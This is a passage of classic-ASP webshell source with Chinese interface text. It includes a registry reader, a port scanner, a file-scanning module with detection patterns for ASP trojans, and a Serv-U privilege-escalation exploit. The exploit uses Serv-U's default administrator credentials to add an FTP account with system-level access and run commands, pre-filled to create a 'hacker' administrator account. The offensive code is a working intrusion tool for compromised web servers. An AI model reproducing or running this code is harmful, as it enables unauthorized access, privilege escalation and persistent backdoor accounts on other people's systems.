RRS "自動登錄的帳戶密碼: " & autoLoginPassword & "<br>"
End If
RRS "</ol>"
End Sub
sub ReadREG()
RRS "注冊表鍵值讀取:<hr/>"
RRS "<form method=post>"
RRS "<input type=hidden value=readReg name=theAct>"
RRS "<input name=thePath 
value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " <input type=submit value=' 讀取 '>"
RRS "<span id=regeditInfo style='display:none;'><hr/>"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不顯示上次登錄用戶}<br/>"
RRS 
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用戶無法列舉本機用戶列表,2=匿名用戶無法連接本機IPC$共享
}<br/>"
RRS 
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默認共享}<br/>"
RRS 
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {關閉網絡共享}<br/>"
RRS 
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {啟用TCP/IP篩選(所有試配器)}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允許IP路由}
<br/>"
RRS "-------以下似乎要看綁定的網卡,不知道是否准確---------<br/>"
RRS 
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默認網
關}<br/>"
RRS 
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允許的TCP/IP端口}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允許的UDP端口}<br/>"
RRS "-----------OVER--------------------<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共幾塊活動網
卡}<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {當前網卡的
序列(把上面的替換)}<br/>"
RRS "</span>"
RRS "</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "<li>" & theArray(i)
Next
 Else
RRS "<li>" & theArray
End If
end if
end sub
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"<p>端口掃描器</p>"
RRS"<form name='form1' method='post' action='' 
onSubmit='form1.submit.disabled=true;'>"
RRS"<p>Scan IP: "
RRS" <input name='ip' type='text' class='TextBox' id='ip' 
value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"<br>Port List:"
RRS"<input name='port' type='text' class='TextBox' size='60' 
value='"&PortList&"'>"
RRS"<br><br>"
RRS"<input name='submit' type='submit' class='buttom' value=' 掃描 '>"
RRS"<input name='scan' type='hidden' id='scan' value='111'>"
RRS"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("<b>掃描報告:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then 
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then 
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"<hr>Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
    On Error Resume Next
    set conn = Server.CreateObject("ADODB.connection")
    connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& 
portNum &";User ID=lake2;Password=;"
    conn.ConnectionTimeout = 1
    conn.open connstr
    If Err Then
        If Err.number = -2147217843 or Err.number = -2147467259 
Then
            If InStr(Err.description, "(Connect()).") > 0 
Then
                RRS(targetip & ":" & portNum & 
".........關閉<br>")
            Else
                RRS(targetip & ":" & portNum & 
".........<font color=red>開放</font><br>")
            End If
        End If
    End If
End Sub
Select Case Action
  Case "MainMenu":MainMenu()
  Case "getTerminalInfo":getTerminalInfo()
  case "ScanPort":ScanPort()
  Case "Servu"
SUaction=request("SUaction")
if  not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " 
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & 
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & 
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & 
vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & 
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & 
vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & 
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, 
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & 
quit
set session("a")=a
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction' 
value='2'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在連接 127.0.0.1:"&port&",使用用戶名: 
"&user&",口令:"&pass&"...<center>');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", 
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & 
vbCrLf & quit
set session("b")=b
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction' 
value='3'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在提升權限,請等待…………<center>');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, 
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"<center>提權完畢,已執行了命令:<br><font 
color=red>"&cmd&"</font><br><br>"
RRS"<input type=button value=' 返回繼續 ' onClick=""location.href='?
Action=Servu';"">"
RRS"</center>"
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
RRS"<center><form method='post' name='goldsun'>"
RRS"<table width='494' height='163' border='1' cellpadding='0' 
cellspacing='1' bordercolor='#666666'>"
RRS"<tr align='center' valign='middle'>"
RRS"<td colspan='2'>Serv-U 提升權限 漫步雲端修改版</td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td width='100'>用戶名:</td>"
RRS"<td width='379'><input name='u' type='text' id='u' 
value='LocalAdministrator'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>口 令:</td>"
RRS"<td><input name='p' type='text' id='p' 
value='#l@$ak#.lk;0@P'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>端 口:</td>"
RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>系統路徑:</td>"
RRS"    <td><input name='f' type='text' id='f' value='"&f&"' 
size='8'></td>"
RRS"  </tr>"
RRS"  <tr align='center' valign='middle'>"
RRS"    <td>命 令:</td>"
RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user 
hacker 123456 /add & net localgroup administrators hacker /add' 
size='50'></td>"
RRS"  </tr>"
RRS" <tr align='center' valign='middle'>"
RRS"    <td colspan='2'><input type='submit' name='Submit' value='提
交'> "
RRS"<input type='reset' name='Submit2' value='重置'>"
RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
RRS"</tr></table></form></center>"
end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
    gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function

  Case "kmuma"
    dim Report
    if request.QueryString("act")<>"scan" then
          RRS ("<b>網站根目錄</b>- "&Server.MapPath("/")&"<br>")
        RRS ("<b>本程序目錄</b>- "&Server.MapPath("."))

        RRS "<form action=""?Action=kmuma&act=scan"" 
method=""post"" name=""form1"">"
        RRS "<p><b>填入你要檢查的路徑:</b>"
        RRS "<input name=""path"" type=""text"" 
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”網站
根目錄;“.”為本程序目錄<br><br>"
        RRS "你要干什麼: <input class=c name=""radiobutton"" 
type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 馬"
        RRS "<input class=c type=""radio"" name=""radiobutton"" 
value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合條件之文件<br>"
        RRS "<br /><div id=""showFile1"" 
style=""display:none"">"
        RRS "  查找內容:<input 
name=""Search_Content"" type=""text"" id=""Search_Content"" 
style=""border:1px solid #999"" size=""20"">"
        RRS " 要查找的字符串,不填就只進行日期檢查<br />"
        RRS "  修改日期:<input name=""Search_Date"" 
type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多個日期用;隔開,任意日期填寫 
<a href=""#"" 
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
        RRS "  文件類型:<input 
name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" 
value=""*"" size=""20""> 類型之間用,隔開,*表示所有類型<br /><br 
/></div>"
        RRS "<input type=""submit"" value="" 開始掃描 "" 
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px 
2px;margin:4px;"" />"
        RRS "</form>"
    else
        if request.Form("path")="" then
            RRS("路徑不能為空")
            response.End()
        end if
        if request.Form("path")="\" then
            TmpPath = Server.MapPath("\")
        elseif request.Form("path")="." then
            TmpPath = Server.MapPath(".")
        else
            TmpPath = request.Form("path")
        end if

        timer1 = timer
        Sun = 0
        SumFiles = 0
        SumFolders = 1
        If request.Form("radiobutton") = "sws" Then
            DimFileExt = "asp,cer,asa,cdx"
            Call ShowAllFile(TmpPath)
        Else
            If request.Form("path") = "" or request.Form
("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
                RRS("緝捕條件不完全<br><br><a 
href='javascript:history.go(-1);'>請返回重新輸入</a>")
                response.End()
            End If
            DimFileExt = request.Form("Search_fileExt")
            Call ShowAllFile2(TmpPath)
        End If
RRS "<table width=""100%"" border=""0"" cellpadding=""0"" 
cellspacing=""0"" style='font-size:12px'>"
RRS "<tr><th>Scan WebShell -- 漫步雲端修改版</tr>"
RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid 
#89441f;padding:4px;display:none""></div>"
RRS "掃描完畢!一共檢查文件夾<font 
color=""#FF0000"">"&SumFolders&"</font>個,文件<font 
color=""#FF0000"">"&SumFiles&"</font>個,發現可疑點<font 
color=""#FF0000"">"&Sun&"</font>個"
RRS "<table width=""100%"" border=""1"" cellpadding=""0"" 
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
If request.Form("radiobutton") = "sws" Then
    RRS "<td width=""20%"">文件相對路徑</td>"
    RRS "<td width=""20%"">特征碼</td>"
    RRS "<td width=""40%"">描述</td>"
    RRS "<td width=""20%"">創建/修改時間</td>"
else   
    RRS "<td width=""50%"">文件相對路徑</td>"
    RRS "<td width=""25%"">文件創建時間</td>"
    RRS "<td width=""25%"">修改時間</td>"
end if
    RRS "</tr>"
    RRS Report
    RRS "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS "<br><font style='font-size:12px'>本頁執行共用了"&thetime&"毫秒
</font>"
    end if
Sub ShowAllFile(Path)
    Set F1SO = CreateObject("Scripting.FileSystemObject")
    if not F1SO.FolderExists(path) then exit sub
    Set f = F1SO.GetFolder(Path)
    Set fc2 = f.files
    For Each myfile in fc2
        If CheckExt(F1SO.GetExtensionName
(path&"\"&myfile.name)) Then
            Call ScanFile(Path&Temp&"\"&myfile.name, "")
            SumFiles = SumFiles + 1
        End If
    Next
    Set fc = f.SubFolders
    For Each f1 in fc
        ShowAllFile path&"\"&f1.name
        SumFolders = SumFolders + 1
    Next
    Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
    If InFile <> "" Then
        Infiles = "<font color=red>該文件被<a 
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(InFile)&""" target=_blank>"& InFile & "</a>文件包含執行</font>"
    End If
    Set FSO1s = CreateObject("Scripting.FileSystemObject")
    on error resume next
    set ofile = FSO1s.OpenTextFile(FilePath)
    filetxt = Lcase(ofile.readall())
    If err Then Exit Sub end if
    if len(filetxt)>0 then
        filetxt = vbcrlf & filetxt
        temp = "<a href=""http://"&Request.Servervariables
("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='編輯'>編輯</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")' 
 onclick='return yesok()' class='am' title='刪除'>刪除</a > "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='復制'>復制</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移動'>移動</a>"    
            If instr( filetxt, Lcase
("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase
("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
                Report = 
Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell 或者 
clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font 
color=red>危險組件,一般被ASP木馬利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End if
            If instr( filetxt, Lcase
("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase
("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
                Report = 
Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application 或者 
clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font 
color=red>危險組件,一般被ASP木馬利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            Set regEx = New RegExp
            regEx.IgnoreCase = True
            regEx.Global = True
            regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎腳本被
加密了</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            regEx.Pattern = "\bEv"&"al\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()函數可以執行
任意ASP代碼<br>但是javascript代碼中也可以使用,有可能是誤
報。"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            regEx.Pattern = "[^.]\bExe"&"cute\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font 
color=red>e"&"xecute()函數可以執行任意ASP代碼
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            regEx.Pattern = "\.(Open|Create)TextFile\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>
使用了FSO的CreateTextFile|OpenTextFile讀寫文
件"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            regEx.Pattern = "\.SaveToFile\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>使用了Stream的
SaveToFile函數寫文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
            regEx.Pattern = "\.Save\b"
            If regEx.Test(filetxt) Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>.Save</td><td>使用了XMLHTTP的Save函數
寫文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                temp="-=| 同上 |=-"
            End If
        Set regEx = Nothing
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
        Set Matches = regEx.Execute(filetxt)
        For Each Match in Matches
            tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 
1),"/","\")
            If Not CheckExt(FSO1s.GetExtensionName(tFile)) 
Then
                Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
                SumFiles = SumFiles + 1
            End If
        Next
        Set Matches = Nothing
        Set regEx = Nothing
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        regEx.Pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
        Set Matches = regEx.Execute(filetxt)
        For Each Match in Matches
            tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 
1),"/","\")
            If Not CheckExt(FSO1s.GetExtensionName(tFile)) 
Then
                Call ScanFile( Server.MapPath("\")
&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
                SumFiles = SumFiles + 1
            End If
        Next
        Set Matches = Nothing
        Set regEx = Nothing
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()"".*"""
        Set Matches = regEx.Execute(filetxt)
        For Each Match in Matches
            tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 
1),"/","\")
            If Not CheckExt(FSO1s.GetExtensionName(tFile)) 
Then
                Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")
&"\","",1,1,1) )
                SumFiles = SumFiles + 1
            End If
        Next
        Set Matches = Nothing
        Set regEx = Nothing
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]
*|\()[^""]\)"
        If regEx.Test(filetxt) Then
            Report = 
Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font 
color=red>不能跟蹤檢查Server.e"&"xecute()函數執行的文件。
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
            Sun = Sun + 1
        End If
        Set Matches = Nothing
        Set regEx = Nothing
        Set XregEx = New RegExp
        XregEx.IgnoreCase = True
        XregEx.Global = True
        XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
        Set XMatches = XregEx.Execute(filetxt)
        For Each Match in XMatches
            tmpLake2 = Mid(Match.Value, 1, InStr
(Match.Value, ">"))
            srcSeek = InStr(1, tmpLake2, "src", 1)
            If srcSeek > 0 Then
                srcSeek2 = instr(srcSeek, tmpLake2, 
"=")
                For i = 1 To 50
                    tmp = Mid(tmpLake2, srcSeek2 + 
i, 1)
                    If tmp <> " " and tmp <> chr(9) 
and tmp <> vbCrLf Then
                        Exit For
                    End If
                Next
                If tmp = """" Then
                    tmpName = Mid(tmpLake2, 
srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - 
i - 1)
                Else
                    If InStr(srcSeek2 + i + 1, 
tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr
(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = 
tmpLake2
                    If InStr(tmpName, chr(9)) > 0 
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
                    If InStr(tmpName, vbCrLf) > 0 
Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
                    If InStr(tmpName, ">") > 0 Then 
tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
                End If
                Call ScanFile( Mid(FilePath,1,InStrRev
(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")
&"\","",1,1,1))
                SumFiles = SumFiles + 1
            End If
        Next
        Set Matches = Nothing
        Set regEx = Nothing
        Set regEx = New RegExp
        regEx.IgnoreCase = True
        regEx.Global = True
        regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
        Set Matches = regEx.Execute(filetxt)
        For Each Match in Matches
            If Instr(Match.Value, "&") or Instr
(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr
(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
                Report = 
Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObjec
t函數使用了變形技術"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
                Sun = Sun + 1
                exit sub
            End If
        Next
        Set Matches = Nothing
        Set regEx = Nothing
    end if
    set ofile = nothing
    set FSO1s = nothing
End Sub
Function CheckExt(FileExt)
    If DimFileExt = "*" Then CheckExt = True
    Ext = Split(DimFileExt,",")
    For i = 0 To Ubound(Ext)
        If Lcase(FileExt) = Ext(i) Then 
            CheckExt = True
            Exit Function
        End If
    Next
End Function
Function GetDateModify(filepath)
    Set F2SO = CreateObject("Scripting.FileSystemObject")
    Set f = F2SO.GetFile(filepath) 
    s = f.DateLastModified 
    set f = nothing
    set F2SO = nothing
    GetDateModify = s
End Function
Function GetDateCreate(filepath)
    Set F3SO = CreateObject("Scripting.FileSystemObject")
    Set f = F3SO.GetFile(filepath) 
    s = f.DateCreated 
    set f = nothing
    set F3SO = nothing
    GetDateCreate = s
End Function
Function tURLEncode(Str)
    temp = Replace(Str, "%", "%25")
    temp = Replace(temp, "#", "%23")
    temp = Replace(temp, "&", "%26")
    tURLEncode = temp
End Function
Sub ShowAllFile2(Path)
    Set F4SO = CreateObject("Scripting.FileSystemObject")
    if not F4SO.FolderExists(path) then exit sub
    Set f = F4SO.GetFolder(Path)
    Set fc2 = f.files
    For Each myfile in fc2
        If CheckExt(F4SO.GetExtensionName
(path&"\"&myfile.name)) Then
            Call IsFind(Path&"\"&myfile.name)
            SumFiles = SumFiles + 1
        End If
    Next
    Set fc = f.SubFolders
    For Each f1 in fc
        ShowAllFile2 path&"\"&f1.name
        SumFolders = SumFolders + 1
    Next
    Set F4SO = Nothing
End Sub
Sub IsFind(thePath)
    theDate = GetDateModify(thePath)
    on error resume next
    theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
    if err then exit Sub
    xDate = Split(request.Form("Search_Date"),";")
    If request.Form("Search_Date") = "ALL" Then ALLTime = True
    For i = 0 To Ubound(xDate)
        If theTmp = xDate(i) or ALLTime = True Then 
            If request("Search_Content") <> "" Then
                Set FSO2s = CreateObject
("Scripting.FileSystemObject")
                set ofile = FSO2s.OpenTextFile(thePath, 
1, false, -2)
                filetxt = Lcase(ofile.readall())
                If Instr( filetxt, LCase(request.Form
("Search_Content"))) > 0 Then
                    temp = "<a 
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a>"
    temp=temp&" → <a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='編輯'>編輯</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")' 
 onclick='return yesok()' class='am' title='刪除'>刪除</a > "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='復制'>復制</a> "
